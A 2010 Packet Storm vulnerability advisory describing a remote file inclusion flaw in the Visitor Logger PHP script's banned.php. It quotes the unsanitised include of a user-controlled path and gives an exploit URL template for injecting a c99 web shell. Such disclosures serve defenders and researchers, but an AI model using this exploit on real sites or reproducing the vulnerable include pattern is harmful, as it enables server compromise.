Visitor Logger Remote File Inclusion

2010-06-02T00:00:00
ID PACKETSTORM:90155
Type packetstorm
Reporter bd0rk
Modified 2010-06-02T00:00:00

Description

                                        
                                            `  
  
#-> Visitor Logger (banned.php) Remote File Include Vulnerability  
  
#-> Date: 2010/05/31  
  
#-> Vendor: http://www.graviton-mediatech.com  
  
#-> Download: http://www.graviton-mediatech.com/downloads/Visitor-Logger/Visitor-Logger.zip  
  
#-> Googledork: n/a  
  
#-> Discovered by bd0rk  
  
#-> Contact: bd0rk[at]school-of-hack.net or bd0rk[at]hackermail.com  
  
#-> Website: www.soh-crew.it.tt  
  
#-> Gr33tings: TheJT, Luna-Tic, Frauenarzt, Punkti ;-)  
  
-------------------------------------------------------------------------------  
  
Description 1: Look in file banned.php line three to four and you can see this  
  
if (file_exists($VL_include_path."/banned.txt")) {  
include($VL_include_path."/banned.txt");  
  
-------------------------------------------------------------------------------  
  
[+]Exploit: http://[target].com/[logger_path]/banned.php?VL_include_path=[SHELLCODE]  
  
  
--> An attacker can use c99-shellcode, for example.  
  
  
  
  
#### The 21 years old, german Hacker bd0rk ####  
  
  
`